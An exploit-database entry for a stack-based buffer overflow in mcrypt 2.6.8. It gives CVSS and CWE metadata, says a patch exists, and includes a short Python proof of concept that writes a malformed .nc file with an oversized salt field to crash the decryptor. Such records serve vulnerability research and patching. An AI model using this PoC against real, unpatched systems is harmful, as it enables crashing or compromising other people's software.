mcrypt - exploit.company

vendor:

mcrypt

by:

_ishikawa

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: mcrypt

Affected Version From: 2.6.8

Affected Version To: 2.6.8

Patch Exists: YES

Related CWE: N/A

CPE: mcrypt

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 12.04.1

2012

mcrypt <= 2.6.8 stack-based buffer overflow poc

mcrypt is a command line tool for encrypting and decrypting files. It contains a stack-based buffer overflow vulnerability when decrypting .nc files with too long salt data. This vulnerability can be exploited by a malicious user to execute arbitrary code.

Mitigation:

Upgrade to the latest version of mcrypt.

Source

Exploit-DB raw data:

#!/usr/bin/env python

# mcrypt <= 2.6.8 stack-based buffer overflow poc
# http://mcrypt.sourceforge.net/
# (the command line tool, not the library)
#
# date: 2012-09-04
# exploit author: _ishikawa
# tested on: ubuntu 12.04.1
# tech: it overflows in check_file_head() when decrypting .nc files with too long salt data
#
# shout-outs to all cryptoparty people

import sys

sprawl = 105
gibson = "\x00\x6d\x03\x40\x73\x65\x72\x70\x65\x6e\x74\x00\x20\x00\x63\x62"
gibson += "\x63\x00\x6d\x63\x72\x79\x70\x74\x2d\x73\x68\x61\x31\x00"
gibson += chr(sprawl)
gibson += ("A" * sprawl)
gibson += (chr(0) * 3)

try:
  count0 = open("cyberpunk.nc", "wb")
  count0.write(gibson)
  count0.close()
except IOError:
  print "file error"
  sys.exit(1)

print "now run  mcrypt -d cyberpunk.nc"